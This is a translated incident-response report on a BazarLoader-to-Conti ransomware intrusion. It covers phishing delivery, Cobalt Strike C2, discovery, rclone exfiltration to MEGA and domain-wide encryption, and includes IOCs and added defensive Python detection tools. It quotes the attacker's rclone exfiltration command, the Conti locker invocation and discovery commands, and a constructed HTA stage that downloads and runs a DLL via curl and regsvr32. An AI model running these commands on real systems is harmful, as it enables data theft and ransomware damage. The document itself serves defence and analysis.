Translator: Knownsec 404 Lab translation team
Original: https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/

In this report we walk through a case from early August in which the attackers used BazarLoader and Cobalt Strike and finished by encrypting systems with Conti ransomware.

The case used the usual list of discovery tools: AdFind, Net, Ping, PowerView and Nltest. Rclone was used to move company data to MEGA, and Process Hacker was used to dump LSASS. The attackers executed a Conti batch file on a server, which then encrypted most of the domain.

Summary

In August we observed an intrusion that began with a BazarLoader infection. Delivery was most likely a phishing campaign that sent victims password-protected zip files containing weaponized Word documents. A macro in the document extracted and executed a malicious .HTA file, which in turn downloaded the BazarLoader DLL and loaded it in memory.

It is well understood in the infosec community that intrusions which start with BazarLoader frequently end in Conti ransomware, and this case reached the same conclusion. Incidents involving Conti show clear similarities: the ransomware operators' tooling and the overall sequence of actions tend to match across the cluster, which is obvious when this case is compared with our earlier Conti incidents. This is probably a consequence of the Conti manual leaked by an affiliate being so widely circulated. Here we saw the same pattern of events, with net, nltest and ShareFinder for discovery, Cobalt Strike for C2, and WMIC remote process creation to extend access across the network.

Although the intrusion lasted five days in total, Cobalt Strike and hands-on-keyboard activity appeared within the first two hours. The operators immediately began collecting information, using net commands to get the lay of the land, and then ran the PowerView module Invoke-ShareFinder to look for open shares.

After collecting and reviewing the ShareFinder output they appear to have had a good picture of the organization's server and workstation layout, because they began running commands to gather information from specific high-value servers. During this phase we saw errors where the operator failed to replace a particular parameter, which indicates they were working from a predefined playbook. They eventually pivoted to a server via WMIC to execute a DLL.

Once they had a Cobalt Strike beacon on the remote server they re-ran Invoke-ShareFinder, then used Rclone to exfiltrate valuable data from several servers to the MEGA cloud storage service. On day two the attackers used RDP to access the backup server, and during that session reviewed the backup settings and the processes running on the server through the Task Manager GUI. On day four they carried out another round of exfiltration with Rclone and MEGA. On day five they moved quickly to their final objective, Conti ransomware. Before executing Conti they used RDP to install and configure the AnyDesk remote desktop application and, having GUI access, attempted to dump the LSASS process with ProcessHacker. After that last step they deployed Conti to every domain-joined system via a batch script.

One notable aspect of this case is that we did not see the attackers interact with the domain controllers (DCs) at all, whereas most ransomware incidents involve the attacker executing code on the DCs.

Timeline

Analysis and reporting completed by @Kostastsale, @pigerlin and @_pete_0, reviewed by @TheDFIRReport.

MITRE ATT&CK

Initial Access

Thanks to @James_inthe_box for the sample.

As in previously documented intrusions, the attackers used a Microsoft Word document that lures the user into enabling macros in order to execute the payload. The user is shown the usual lure prompting them to enable content.

Looking at the file, the document labelled as a .doc turns out to be XML when its file properties are examined. Closer inspection reveals the Word 2003 XML format and the embedded macro.

Once macros are enabled, the next stage creates an HTML Application (HTA) file, drops it into the user's folder and executes it.

Analysis of the HTA shows a mix of encoded HTML and JavaScript/VBScript code, not to mention the profanity at the start of the file. The base64-encoded string decodes to code that downloads a binary disguised as a jpg (compareFor.jpg) from millscruelg[.]com into the folder c:\users\public and then, together with the VBScript code, executes the DLL via REGSVR32.
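The decode-and-triage step described above can be scripted. The following Python is an added example written for this translation, not code from The DFIR Report: it extracts base64 runs from an HTA body, decodes those that yield printable text, and reports the URLs, drop paths and LOLBin invocations found at any layer. The sample HTA embedded in it is constructed for the example; the domain loader.example, the curl download and the Dec() stub are placeholders, not the real dropper's code.

```python
"""Triage helper for HTA droppers: decode embedded base64 and list what it calls.

Added example for this article, not code from The DFIR Report. The sample HTA
below is constructed; loader.example, the curl download and the Dec() stub are
placeholders standing in for the real dropper's logic.
"""
import base64
import json
import re

# A run of 40+ base64 alphabet characters, optionally padded.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
URL_RE = re.compile(r"https?://[\w.\-]+(?::\d+)?(?:/[^\s'\"<>)]*)?", re.I)
# Windows drive-letter paths such as c:\users\public\compareFor.jpg
PATH_RE = re.compile(r"[A-Za-z]:\\[^\s'\"<>]+")
# Living-off-the-land binaries followed by their arguments, up to a quote or end of line.
LOLBIN_RE = re.compile(
    r"\b(?:regsvr32|rundll32|mshta|wscript|cscript|powershell)(?:\.exe)?\s+[^\r\n'\"]*", re.I)


def decode_base64_runs(text):
    """Return the decoded text of every base64 run that yields (almost) all printable bytes."""
    decoded = []
    for match in B64_RUN.finditer(text):
        blob = match.group(0)
        blob += "=" * (-len(blob) % 4)          # restore padding the author may have stripped
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:                        # binascii.Error is a ValueError subclass
            continue
        if not raw:
            continue
        printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in raw)
        if printable / len(raw) >= 0.95:          # skip identifiers that merely look like base64
            decoded.append(raw.decode("ascii", "replace"))
    return decoded


def triage_hta(text):
    """Collect URLs, drop paths and LOLBin invocations from the raw HTA and its decoded layers."""
    layers = [text] + decode_base64_runs(text)
    joined = "\n".join(layers)
    return {
        "decoded_layers": len(layers) - 1,
        "urls": sorted(set(URL_RE.findall(joined))),
        "paths": sorted(set(PATH_RE.findall(joined))),
        "lolbins": sorted({m.group(0).strip() for m in LOLBIN_RE.finditer(joined)}),
    }


# Constructed second stage: fetch a DLL disguised as a jpg into c:\users\public and run it via regsvr32.
STAGE2 = (
    'Set sh = CreateObject("WScript.Shell")\r\n'
    'sh.Run "cmd /c curl http://loader.example/compareFor.jpg -o c:\\users\\public\\compareFor.jpg", 0, True\r\n'
    'sh.Run "regsvr32 /s c:\\users\\public\\compareFor.jpg", 0, False\r\n'
)

# Constructed HTA wrapper: VBScript that decodes the blob and Execute()s it.
SAMPLE_HTA = (
    '<html><head><HTA:APPLICATION WINDOWSTATE="minimize" SHOWINTASKBAR="no"/></head>\n'
    '<script language="VBScript">\n'
    "Function Dec(s)\n"
    "  ' base64 decode via MSXML DOM goes here (stub for the example)\n"
    "End Function\n"
    'Execute Dec("' + base64.b64encode(STAGE2.encode()).decode() + '")\n'
    "</script></html>\n"
)

if __name__ == "__main__":
    print(json.dumps(triage_hta(SAMPLE_HTA), indent=2))
```

Real droppers often stack several encoding layers (base64 inside string concatenation inside Chr() calls); the printable-ratio filter keeps the first layer honest, and the same function can be re-run on each decoded layer until no new blobs appear.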


This initiated a connection to 64.227.65[.]60:443 and invoked svchost.exe, which then looked up myexternalip[.]com to retrieve the network's external, public-facing IPv4 address. Attackers can use this to validate the target network and to tune their tooling. Two DLLs were then loaded via RunDll32 using the svchost process: first D574.dll, followed by D8B3.dll.

D8B3.dll injected into the Winlogon process (high integrity). D8B3.dll is a compiled DLL; the strings matched by the YARA rule for it at the end of this report (Go runtime error messages) indicate it was built with Go.

Both DLLs carry invalid certificates and can be detected on any failed/revoked signature status. In addition, neither DLL has populated version metadata associated with it.

The process hierarchy tree (shown as a figure in the original report) closely matches Brad Duncan's August 11 analysis of BazarLoader.

Persistence

We found the AnyDesk application created under the folder c:\users\\Videos, an unusual and suspicious location for process activity. A portable executable appearing in a non-standard file system location also makes detection straightforward.

AnyDesk is a closed-source remote desktop application available for several operating systems and free for private use. We observed long-lived connections from AnyDesk to legitimately registered IPv4 ranges, but found nothing of much value in those sessions.

Credential Access

ProcessHacker was also dropped in the root of C:\, most likely to access the LSASS process. Ordinary users rarely run utilities like ProcessHacker, and an application sitting in the root of C:\ is suspicious in many environments.

Discovery

Through RunDLL32 and the Winlogon process we observed many of the typical host and network discovery commands, using net, nltest, tasklist and time, among others. Examples include:

tasklist /s <REDACTED>
net group "domain admins" /dom
net localgroup "administrator"
nltest /domain_trusts /all_trusts
net view /all /domain
net view /all
time
ping

Copy-and-paste errors while running some of these commands suggest the operator was working from a run book, much like the Conti manual leaked in August: after the error, the command can be seen as "tasklist /s IP", with the literal placeholder "IP" rather than an actual host IP address.

Many of these commands were invoked by cmd.exe with an unusual parent process, such as RunDLL32.exe; the time command is one example.

Red Canary has a good detection guide for rundll32 that covers activity such as rundll32 running without command-line arguments and unusual spawning behaviour.

AdFind was written to disk as a binary, but we found no evidence that it was executed.

File share enumeration was carried out with the PowerShell Invoke-ShareFinder script (part of PowerView). The output file was created at c:\ProgramData\found_shares.txt. We have seen the same tool in other recent intrusions. PowerShell was invoked by the WinLogon process and the results file was created by Rundll32.exe.


On day two of the intrusion the attackers accessed the backup server over RDP and via the Cobalt Strike beacon, and opened the backup console on that server. After reviewing the backups they also opened Task Manager through the GUI (indicated by the /4 in the process command line) to look at the processes running on the system.

Lateral Movement

The attackers executed a Cobalt Strike beacon on a key network asset (the backup host in this intrusion). Remote process execution was achieved through WMI, invoking rundll32 on the target host to load 143.dll (a Cobalt Strike beacon).

The Cobalt Strike beacon (143.dll) injected into the svchost process 'svchost.exe -k UnistackSvcGroup -s CDPUserSvc' and then reached out to checkauj[.]com (82.117.252.143). Roughly nine hours later the attackers established an RDP session through the 143.dll beacon, and we were able to tie these activities together.

In this incident we believe the attackers leaked the name of their remote workstation, "win-344vu98d3ru", through the RDP session.

Command and Control

The Bazar DLL disguised as a jpg used HTTPS C2 throughout the intrusion.

Bazar C2

64.227.65.60:443

JA3:72a589da586844d7f0818ce684948eea
JA3s:ec74a5c51106f0419184d0dd08fb05bc
Certificate: [7f:d6:df:4d:5e:c4:d9:71:c0:46:8d:47:e5:81:75:57:d6:92:72:96 ]
Not Before: 2021/08/03 07:37:28 UTC 
Not After: 2022/08/03 07:37:28 UTC 
Issuer Org: GG EST 
Subject Common: perdefue.fr 
Subject Org: GG EST 
Public Algorithm: rsaEncryption

161.35.147.110:443

JA3:72a589da586844d7f0818ce684948eea
JA3s:ec74a5c51106f0419184d0dd08fb05bc
Certificate: [21:ff:9f:e0:8a:dd:c3:ed:36:90:a0:e1:11:70:fe:c4:b3:42:f5:1a ]
Not Before: 2021/08/03 07:37:30 UTC 
Not After: 2022/08/03 07:37:30 UTC 
Issuer Org: GG EST 
Subject Common: perdefue.fr 
Subject Org: GG EST 
Public Algorithm: rsaEncryption

161.35.155.92:443

JA3:72a589da586844d7f0818ce684948eea
JA3s:ec74a5c51106f0419184d0dd08fb05bc
Certificate: [42:7d:a4:48:5b:6b:2b:92:2c:07:9d:cc:59:14:2e:de:b1:e8:f5:bb ]
Not Before: 2021/08/03 07:37:30 UTC 
Not After: 2022/08/03 07:37:30 UTC 
Issuer Org: GG EST 
Subject Common: perdefue.fr 
Subject Org: GG EST 
Public Algorithm: rsaEncryption

64.227.69.92:443

JA3:72a589da586844d7f0818ce684948eea
JA3s:ec74a5c51106f0419184d0dd08fb05bc
Certificate: [97:33:eb:80:85:ae:f0:0e:40:94:ac:d5:38:96:6a:e5:75:2b:49:8c ]
Not Before: 2021/08/03 07:37:28 UTC 
Not After: 2022/08/03 07:37:28 UTC 
Issuer Org: GG EST 
Subject Common: perdefue.fr 
Subject Org: GG EST 
Public Algorithm: rsaEncryption

Cobalt Strike

The first DLL, D574.dll, was not followed by any immediate activity, whereas D8B3.dll, loaded by rundll32, was involved in much of the attack activity, from file creation and process execution to a persistent network connection to 82.117.252[.]143:443, and is visible throughout the intrusion.

D574.dll, loaded by rundll32, repeatedly queried DNS for volga.azureedge[.]net but never established a network connection. We saw the d574.dll payload attempting to reach volga.azureedge[.]net and its C2 server, with the DNS queries returning status 9003 (DNS_ERROR_RCODE_NAME_ERROR, i.e. NXDOMAIN). External sandboxes show the domain tied to other Cobalt Strike beacon samples, but those samples are not related to this report; most likely the server had already been taken down.

https://tria.ge/210803-w15fxk72ns

https://capesandbox.com/analysis/175977/

D8B3.dll showed initial activity followed by an established network connection to 82.117.252[.]143:80.

D8B3.dll was the Cobalt Strike beacon the attackers used throughout the intrusion. It served as the primary payload and facilitated most of the initial intrusion and the ongoing maintenance of access. 143.dll, the DLL used to move laterally from the beachhead host to the backup server, also communicated with this Cobalt Strike server. Once the attackers had a foothold and had moved laterally, they were able to use RDP and access specific hosts of value.

  • five.azureedge.net 82.117.252.143:80

  • checkauj.com 82.117.252.143:443

JA3: a0e9f5d64349fb13191bc781f81f42e1
JA3s: ae4edc6faf64d08308082ad26be60767
Certificate: [68:c5:fc:c0:4a:34:e4:8f:01:86:59:c1:da:40:78:00:00:20:a0:b0 ]
Not Before: 2021/08/03 11:50:47 UTC 
Not After: 2021/11/01 11:50:45 UTC 
Issuer Org: Let's Encrypt 
Subject Common: checkauj.com [checkauj.com ,www.checkauj.com ]
Public Algorithm: rsaEncryption

Cobalt Strike configuration

82.117.252.143 – checkauj.com

{
    "BeaconType": [
        "HTTP"
    ],
    "Port": 80,
    "SleepTime": 60000,
    "MaxGetSize": 1403644,
    "Jitter": 37,
    "C2Server": "checkauj.com,/jquery-3.3.1.min.js",
    "HttpPostUri": "/jquery-3.3.2.min.js",
    "Malleable_C2_Instructions": [
        "Remove 1522 bytes from the end",
        "Remove 84 bytes from the beginning",
        "Remove 3931 bytes from the beginning",
        "Base64 URL-safe decode",
        "XOR mask w/ random key"
    ],
    "SpawnTo": "AAAAAAAAAAAAAAAAAAAAAA==",
    "HttpGet_Verb": "GET",
    "HttpPost_Verb": "POST",
    "HttpPostChunk": 0,
    "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe",
    "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe",
    "CryptoScheme": 0,
    "Proxy_Behavior": "Use IE settings",
    "Watermark": 0,
    "bStageCleanup": "True",
    "bCFGCaution": "False",
    "KillDate": 0,
    "bProcInject_StartRWX": "True",
    "bProcInject_UseRWX": "False",
    "bProcInject_MinAllocSize": 17500,
    "ProcInject_PrependAppend_x86": [
        "kJA=",
        "Empty"
    ],
    "ProcInject_PrependAppend_x64": [
        "kJA=",
        "Empty"
    ],
    "ProcInject_Execute": [
        "CreateThread",
        "SetThreadContext",
        "CreateRemoteThread",
        "RtlCreateUserThread"
    ],
    "ProcInject_AllocationMethod": "VirtualAllocEx",
    "bUsesCookies": "True",
    "HostHeader": ""}
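The SleepTime and Jitter in this config bound the beacon's check-in cadence, and the C2Server and HttpPostUri fields give the exact URIs to look for. As an added example (not from the original report), the Python below derives the expected interval window from the config and flags source hosts in a constructed proxy log whose requests to those URIs keep that cadence. Beacon applies jitter by shortening each sleep by up to Jitter percent, so with these values consecutive check-ins should land between 37.8 s and 60 s apart. The log format, source host names and timestamps are made up; the config values are the ones shown above.

```python
"""Derive a network hunt from a Cobalt Strike beacon config.

Added example for this article, not code from The DFIR Report. Beacon shortens
each sleep by a random amount of up to Jitter percent, so with the values from
the config above consecutive check-ins should arrive between 60 s * (1 - 0.37)
= 37.8 s and 60 s apart. The proxy log below is constructed: the format, the
source host names and the timestamps are made up; the C2 host and URIs are the
ones from the extracted config.
"""
from collections import defaultdict
from datetime import datetime

# Fields taken from the config extracted above.
BEACON_CONFIG = {
    "SleepTime": 60000,
    "Jitter": 37,
    "C2Server": "checkauj.com,/jquery-3.3.1.min.js",
    "HttpPostUri": "/jquery-3.3.2.min.js",
    "HttpGet_Verb": "GET",
    "HttpPost_Verb": "POST",
}


def interval_bounds(cfg, tolerance=0.10):
    """Seconds between check-ins: [sleep*(1-jitter), sleep], widened by a tolerance for skew."""
    sleep = cfg["SleepTime"] / 1000.0
    low = sleep * (1 - cfg["Jitter"] / 100.0)
    return low * (1 - tolerance), sleep * (1 + tolerance)


def c2_endpoints(cfg):
    """C2 host plus the (verb, uri) pairs Beacon uses for GET check-ins and POST responses."""
    host, get_uri = cfg["C2Server"].split(",", 1)
    return host.strip(), {
        (cfg["HttpGet_Verb"], get_uri.strip()),
        (cfg["HttpPost_Verb"], cfg["HttpPostUri"]),
    }


def parse_proxy_line(line):
    """Constructed log format: '<ISO-8601 time> <src> <method> <host> <uri> <status>'."""
    ts, src, method, host, uri, status = line.split()
    return datetime.fromisoformat(ts), src, method, host, uri, int(status)


def find_beaconing_hosts(lines, cfg, min_hits=4, min_ratio=0.8):
    """Flag sources whose requests to the C2 URIs are spaced like the configured sleep/jitter."""
    host, endpoints = c2_endpoints(cfg)
    low, high = interval_bounds(cfg)
    by_src = defaultdict(list)
    for line in lines:
        ts, src, method, h, uri, _ = parse_proxy_line(line)
        if h == host and (method, uri) in endpoints:
            by_src[src].append(ts)
    flagged = {}
    for src, stamps in by_src.items():
        stamps.sort()
        deltas = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        hits = [d for d in deltas if low <= d <= high]
        if deltas and len(hits) >= min_hits and len(hits) / len(deltas) >= min_ratio:
            flagged[src] = {"requests": len(stamps), "in_window": len(hits),
                            "window_s": (round(low, 1), round(high, 1))}
    return flagged


# Constructed proxy log: ws01 checks in at beacon cadence; ws02 is a browser hitting the same URI twice.
SAMPLE_PROXY_LOG = [
    "2021-08-03T12:00:00 ws01 GET checkauj.com /jquery-3.3.1.min.js 200",
    "2021-08-03T12:00:58 ws01 GET checkauj.com /jquery-3.3.1.min.js 200",
    "2021-08-03T12:01:40 ws01 GET checkauj.com /jquery-3.3.1.min.js 200",
    "2021-08-03T12:02:35 ws01 GET checkauj.com /jquery-3.3.1.min.js 200",
    "2021-08-03T12:03:20 ws01 POST checkauj.com /jquery-3.3.2.min.js 200",
    "2021-08-03T12:04:19 ws01 GET checkauj.com /jquery-3.3.1.min.js 200",
    "2021-08-03T12:00:05 ws02 GET checkauj.com /jquery-3.3.1.min.js 200",
    "2021-08-03T12:09:30 ws02 GET checkauj.com /jquery-3.3.1.min.js 200",
    "2021-08-03T12:09:31 ws02 GET code.jquery.com /jquery-3.3.1.min.js 200",
]

if __name__ == "__main__":
    for src, info in find_beaconing_hosts(SAMPLE_PROXY_LOG, BEACON_CONFIG).items():
        print(src, info)
```

Because jitter only ever shortens the sleep, gaps longer than SleepTime (plus the tolerance) are misses rather than evidence; in a real environment the same logic runs over proxy or NetFlow data keyed on the JA3/JA3s pair and certificate listed above as well as on the URIs.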

Exfiltration

Once the attackers had established access to key assets they used Rclone to move sensitive data to the MEGA cloud storage service. The full Rclone command line carried a number of parameters, including a bandwidth limit:

rclone.exe  copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M

Rclone remains a popular and effective tool for bulk data exfiltration; NCC Group has published a detailed write-up on Rclone usage and its detection.

Rclone was seen on two separate occasions, each lasting roughly three hours.
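The discovery commands and odd parent processes from the Discovery section, the WMIC remote rundll32 execution from the Lateral Movement section and the Rclone command above are all visible in process-creation telemetry (Sysmon event ID 1 or Windows 4688). The following Python is an added example, not tooling from The DFIR Report, that scores a constructed set of such events with one rule per behaviour, including the unreplaced "IP" placeholder from the run book. Field names follow Sysmon; the event contents, host names, the DLL path and export name in the WMIC command, and the rule weights are all assumptions made for the example.

```python
"""Score process-creation events for the Conti playbook behaviours seen in this intrusion.

Added example for this article, not tooling from The DFIR Report. Event field
names follow Sysmon event ID 1; the events themselves are constructed. The DLL
path and export in the WMIC command, the host names and the rule weights are
assumptions made for the example.
"""
import re
from collections import defaultdict
from ntpath import basename

SHELLS = {"cmd.exe", "powershell.exe"}
ODD_PARENTS = {"rundll32.exe", "winlogon.exe"}       # parents seen spawning shells in this case

# Discovery commands from the leaked Conti manual that were run here.
DISCOVERY = re.compile(
    r'net\s+group\s+"?domain admins"?|nltest\s+/domain_trusts|net\s+view\s+/all|'
    r'net\s+localgroup\s+"?administrator|tasklist\s+/s\s', re.I)
# The run-book placeholder "IP" left unreplaced (case-sensitive on purpose).
PLACEHOLDER = re.compile(r"tasklist\s+/s\s+IP\b")
# Remote process creation via WMIC that loads a DLL with rundll32.
WMIC_REMOTE_RUNDLL = re.compile(r"\bwmic\b.*\bprocess\s+call\s+create\b.*rundll32", re.I)
# Rclone copy/sync/move to a named cloud remote such as Mega:DATA.
RCLONE_CLOUD = re.compile(r"\brclone(?:\.exe)?\s+(?:copy|sync|move)\b.*\b(?:mega|s3|b2|drive|dropbox):", re.I)
SHAREFINDER = re.compile(r"Invoke-ShareFinder|Find-DomainShare", re.I)


def _img(event, key):
    return basename(event.get(key, "")).lower()


# (rule name, weight, predicate)
RULES = [
    ("shell_from_rundll32_or_winlogon", 3,
     lambda e: _img(e, "Image") in SHELLS and _img(e, "ParentImage") in ODD_PARENTS),
    ("conti_playbook_discovery", 1, lambda e: bool(DISCOVERY.search(e["CommandLine"]))),
    ("runbook_placeholder_ip", 3, lambda e: bool(PLACEHOLDER.search(e["CommandLine"]))),
    ("wmic_remote_rundll32", 3, lambda e: bool(WMIC_REMOTE_RUNDLL.search(e["CommandLine"]))),
    ("rundll32_spawned_by_wmiprvse", 3,
     lambda e: _img(e, "Image") == "rundll32.exe" and _img(e, "ParentImage") == "wmiprvse.exe"),
    ("rclone_to_cloud_remote", 4, lambda e: bool(RCLONE_CLOUD.search(e["CommandLine"]))),
    ("powerview_sharefinder", 3, lambda e: bool(SHAREFINDER.search(e["CommandLine"]))),
]


def evaluate(event):
    """Names and weights of every rule the event triggers."""
    return [(name, weight) for name, weight, pred in RULES if pred(event)]


def score_hosts(events):
    """Aggregate rule hits per Computer so a host running the whole playbook stands out."""
    scores, hits = defaultdict(int), defaultdict(list)
    for event in events:
        for name, weight in evaluate(event):
            scores[event["Computer"]] += weight
            hits[event["Computer"]].append(name)
    return dict(scores), dict(hits)


SYS32 = r"C:\Windows\System32"
SAMPLE_EVENTS = [  # constructed events
    {"Computer": "ws01", "ParentImage": SYS32 + r"\rundll32.exe", "Image": SYS32 + r"\cmd.exe",
     "CommandLine": "cmd.exe /C tasklist /s IP"},
    {"Computer": "ws01", "ParentImage": SYS32 + r"\winlogon.exe", "Image": SYS32 + r"\cmd.exe",
     "CommandLine": 'cmd.exe /C net group "domain admins" /dom'},
    {"Computer": "ws01", "ParentImage": SYS32 + r"\rundll32.exe", "Image": SYS32 + r"\cmd.exe",
     "CommandLine": "cmd.exe /C nltest /domain_trusts /all_trusts"},
    {"Computer": "ws01", "ParentImage": SYS32 + r"\winlogon.exe",
     "Image": SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -nop -exec bypass -c "Invoke-ShareFinder -CheckShareAccess | Out-File C:\ProgramData\found_shares.txt"'},
    {"Computer": "ws01", "ParentImage": SYS32 + r"\rundll32.exe", "Image": SYS32 + r"\wbem\WMIC.exe",
     "CommandLine": r'wmic /node:backup01 process call create "rundll32 C:\ProgramData\143.dll,StartW"'},  # path/export assumed
    {"Computer": "backup01", "ParentImage": SYS32 + r"\wbem\WmiPrvSE.exe", "Image": SYS32 + r"\rundll32.exe",
     "CommandLine": r"rundll32 C:\ProgramData\143.dll,StartW"},
    {"Computer": "backup01", "ParentImage": SYS32 + r"\cmd.exe", "Image": r"C:\ProgramData\rclone.exe",
     "CommandLine": r'rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --bwlimit 10M'},
    {"Computer": "admin01", "ParentImage": r"C:\Windows\explorer.exe", "Image": SYS32 + r"\cmd.exe",
     "CommandLine": "cmd.exe /C tasklist /s fileserver01"},  # benign admin activity for contrast
]

if __name__ == "__main__":
    scores, hits = score_hosts(SAMPLE_EVENTS)
    for host in sorted(scores, key=scores.get, reverse=True):
        print(f"{host:10} score={scores[host]:3} rules={sorted(set(hits[host]))}")
```

A lone discovery command scores low because administrators run them too; what separates the beachhead here is the combination of an abnormal parent, the playbook sequence and the placeholder left in by the operator, which is why the weights are summed per host rather than alerting per event.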


Impact

On day five the attackers took their final action: encrypting the domain. They first pinged systems across the network from an interactive command shell. IObit Unlocker was also dropped at this stage but not used. After the pings, the attackers opened a batch file that was ultimately used to launch the Conti ransomware.

locker.bat is a custom script that encrypts files on multiple hosts. Based on its contents we have reason to believe the attackers made final adjustments after reviewing the ping results and before executing the ransomware, which was then launched from the backup server.

To encrypt each system the ransomware was pointed at the C$ administrative share of every target host and then ran its encryption routine:

C:\o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker.exe -m -net -size 10 -nomutex -p \\TARGETHOST\C$
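For scoping, an IR team wants to know which hosts the batch file pointed the locker at. The Python below is an added example, not from the original report: it parses a locker.bat of the form shown above (one launch line per target, each ending in -p \\<host>\<share>) into the locker path, the per-launch options and a deduplicated host list. The batch content in it is constructed; the host names and the "start" prefix on each line are assumptions, and the locker flags are reported as written without interpreting their meaning.

```python
"""Scope a Conti deployment batch file: targeted hosts and locker options.

Added example for this article, not from The DFIR Report. The batch content
below is constructed to mirror the launch line shown above; the host names
and the "start" prefix are assumptions, and the locker flags are reported
as written without interpreting what each one does.
"""
import re

# A launch line: anything ending in _locker.exe followed by its arguments.
LAUNCH = re.compile(r"(?P<exe>\S*_locker\.exe)\s+(?P<args>.*?)\s*$", re.I)
# \\HOST\SHARE as passed to -p.
UNC = re.compile(r"^\\\\([^\\]+)\\([^\\]+)$")


def parse_options(args):
    """'-a -b 10 -p \\\\H\\C$' -> {'-a': True, '-b': '10', '-p': '\\\\H\\C$'}; a flag takes the next token unless that is a flag."""
    tokens = args.split()
    opts, i = {}, 0
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("-"):
            if i + 1 < len(tokens) and not tokens[i + 1].startswith("-"):
                opts[tok] = tokens[i + 1]
                i += 2
                continue
            opts[tok] = True
        i += 1
    return opts


def parse_locker_bat(text):
    """Return every locker launch (exe, options, host, share) and the lines that were not launches."""
    launches, skipped = [], []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = LAUNCH.search(line)
        if not m:
            skipped.append(line)
            continue
        opts = parse_options(m.group("args"))
        host = share = None
        target = opts.get("-p")
        if isinstance(target, str):
            u = UNC.match(target)
            if u:
                host, share = u.group(1).upper(), u.group(2)
        launches.append({"exe": m.group("exe"), "options": opts, "host": host, "share": share})
    return {"launches": launches, "skipped": skipped}


def target_hosts(parsed):
    """Deduplicated, sorted list of hosts the locker was pointed at."""
    return sorted({l["host"] for l in parsed["launches"] if l["host"]})


LOCKER = r"C:\o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker.exe"
SAMPLE_LOCKER_BAT = "\n".join([  # constructed; host names are placeholders
    "@echo off",
    f"start {LOCKER} -m -net -size 10 -nomutex -p \\\\FS01\\C$",
    f"start {LOCKER} -m -net -size 10 -nomutex -p \\\\FS01\\D$",
    f"start {LOCKER} -m -net -size 10 -nomutex -p \\\\WS-ACCT07\\C$",
    f"start {LOCKER} -m -net -size 10 -nomutex -p \\\\BACKUP01\\C$",
])

if __name__ == "__main__":
    parsed = parse_locker_bat(SAMPLE_LOCKER_BAT)
    print("hosts:", target_hosts(parsed))
    for launch in parsed["launches"]:
        print(launch["host"], launch["share"], launch["options"])
```

The host list is the containment scope; cross-checking it against SMB share-access events (C$ opened from the backup server) shows which of the targets were actually reached.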

An overview of the execution flow and the analysis of the DLL and EXE show the artifacts that identify Conti (figures in the original report). Once encryption completes, the ransom note is dropped as "readme.txt" in every affected directory; the note's text is reproduced as an image in the original report.

After the locker ran, the attackers performed a file-listing discovery across multiple hosts, apparently to verify and assess whether the encryption had succeeded.

IOCs

Network

BazarLoader
64.227.69.92|443
161.35.155.92|443
161.35.147.110|443
64.227.65.60|443

Loader download
millscruelg.com (ZoomEye search result)
45.95.11.133|80

Cobalt Strike
volga.azureedge.net
five.azureedge.net
checkauj.com
82.117.252.143|443
82.117.252.143|80

Files

decree-08.03.2021.doc
f6f72e3d91f7b53dd75e347889a793da
5d4f020115a483e9e5aa9778c038466f9014c90c
14bccfecaaec8353e3e8f090ec1d3e9c87eb8ceb2a7abedfc47c3c980da8ad71
compareForFor.hta
193b84d45dd371c6e4a501333d37349b
742ed8d0202aafba1c162537087a8a131cb85cde
fb38061bf601001c45aafe8d0c5feaa22c607d2ff79cfb841788519ca55a17b4
D8B3.dll
4ba6791f2293a8bc2dfa537015829b3c
d4f5cc55b6fa25f9a45ba7e968438b97e33aefbc
4a49cf7539f9fd5cc066dc493bf16598a38a75f7b656224db1ddd33005ad76f6
D574.dll
663c8d0fe8b770b50792d10f6c07a652
d0361fbcebe59205b2ea6a31041c89464a5e61b6
1872bf6c974e9b11040851f7d30e5326afdc8b13802891c222af4368a14f829c
143.dll
ab3a744545a12ba2f6789e94b789666a
1d5f8d283ed3f6019954aa480182c9913ee49735
6f844a6e903aa8e305e88ac0f60328c184f71a4bfbe93124981d6a4308b14610
ProcessHacker.exe
68f9b52895f4d34e74112f3129b3b00d
c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e
d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f
locker.bat
84361813423910294079d0bc5b6daba2
c0b28fd2d5b62d5129225e8c45d368bc9e9fd415
1edfae602f195d53b63707fe117e9c47e1925722533be43909a5d594e1ef63d3
o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker.exe
7f112bfa16a6bd344aaed28abf606780
eaa792a1c9f1d277af3d88bd9ea17a33275308f3
9cd3c0cff6f3ecb31c7d6bc531395ccfd374bcd257c3c463ac528703ae2b0219
o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker_x64.dll
2c313c5b532c905eb8f1748a0d656ff9
70725329e4c14b39d49db349f3c84e055c111f2d
31656dcea4da01879e80dff59a1af60ca09c951fe5fc7e291be611c4eadd932a
o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker_x86.dll
26bd89afd5c1ba9803422d33185cef89
c99f0fa8d5fbffe5288aaff84dbe980c412ba34e
01a9549c015cfcbff4a830cea7df6386dc5474fd433f15a6944b834551a2b4c9
AnyDesk.exe
e6c3ab2ee9a613efdf995043b140fd8e
33738cf695a6ac03675fe925d62ecb529ac73d03
8f09c538fc587b882eecd9cfb869c363581c2c646d8c32a2f7c1ff3763dcb4e7
unlocker.exe
